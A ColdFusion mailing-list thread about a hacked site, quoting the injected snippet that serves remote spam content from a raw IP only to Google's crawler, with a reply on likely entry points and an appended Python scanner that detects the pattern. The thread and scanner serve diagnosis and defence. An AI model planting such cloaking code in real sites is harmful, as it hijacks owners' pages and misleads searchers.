>Recently a site of ours got hacked - basically, a Google search of the site 
>was returning viagra info!
>What we got was a small script added to the end of a functions.cfm file:
>
><cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) />
><cfif (Find( "google", REQUEST.UserAgent )) >
><cfhttp method="get" url="http://168.16.228.250/fms/">
><cfoutput>#cfhttp.filecontent#</cfoutput></cfif>
>
>I'm not the server admin for this site, so they're sorta pointing the 
>finger at us developers, and we're pointing fingers back at them about 
>lax server security. We've got a boatload of stuff on this site to 
>prevent SQL injection, including Justin D. Scott's application script, 
>carefully checking anything that goes into the database, client and server 
>side form validation, blah, blah, blah...
>
>Anybody seen the above, and if so, thoughts? Anybody manage to determine 
>how the exploit happened to start with?


does the application have any cffile uploads?  do those uploads put the file 
into a url accessible directory?  ftp server hack wouldn't be unthinkable 
either.

but it sounds like a good way to promote clicks :) 

Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353148
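A way to sweep a webroot for the same kind of appended snippet, as an added example that is not part of the thread: it flags CFML files that branch on the crawler user agent and echo remote `cfhttp` content. The function names, the extra crawler names beyond "google" and the sample inputs are assumptions made for this sketch.

```python
import re
import sys
from pathlib import Path

# Patterns derived from the snippet quoted in the thread.
CFHTTP_URL = re.compile(r"<cfhttp\b[^>]*\burl\s*=\s*[\"']([^\"']+)[\"']", re.I)
ECHO = re.compile(r"#\s*cfhttp\.filecontent\s*#", re.I)
UA_REF = re.compile(r"cgi\.http_user_agent", re.I)
# Assumption: crawler names other than "google" are additions for this sketch.
CRAWLER = re.compile(
    r"[\"'][^\"'\n]{0,40}(google|bing|yahoo|slurp|baidu)[^\"'\n]{0,40}[\"']", re.I)
RAW_IP = re.compile(r"^https?://\d{1,3}(\.\d{1,3}){3}([:/]|$)", re.I)

# Constructed samples; 192.0.2.10 is a documentation address, not an indicator.
SAMPLE_INJECTED = '''<cffunction name="fmt"><cfreturn 1></cffunction>
<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /><cfif (Find( "google", REQUEST.UserAgent )) >
<cfhttp method="get" url="http://192.0.2.10/fms/"><cfoutput>#cfhttp.filecontent#</cfoutput></cfif>
'''
SAMPLE_CLEAN = '''<cfhttp method="get" url="https://api.example.com/rates" result="r">
<cflog text="ua=#CGI.http_user_agent#">
<cfoutput>#DateFormat(Now())#</cfoutput>
'''

def scan_source(text):
    """Return the list of heuristic findings for one CFML source string."""
    findings = []
    urls = CFHTTP_URL.findall(text)
    if urls and ECHO.search(text):
        findings.append("remote-content-echo")   # fetched body written to the page
    if UA_REF.search(text) and CRAWLER.search(text):
        findings.append("crawler-ua-branch")     # behaviour depends on crawler UA
    if any(RAW_IP.match(u) for u in urls):
        findings.append("cfhttp-to-raw-ip")      # fetch target is a bare IP address
    return findings

def is_cloaking(findings):
    """Both halves of the pattern present: UA branch plus echoed remote content."""
    return {"remote-content-echo", "crawler-ua-branch"} <= set(findings)

def scan_tree(root):
    """Scan every .cfm/.cfc file under root; return {path: findings} for hits."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".cfm", ".cfc"}:
            found = scan_source(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

if __name__ == "__main__":
    for name, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(("CLOAKING " if is_cloaking(found) else "review   ") + name, found)
```

Comparing the modification times of flagged files against the FTP and web server logs for the same window helps narrow down which of the entry points raised in the reply was used.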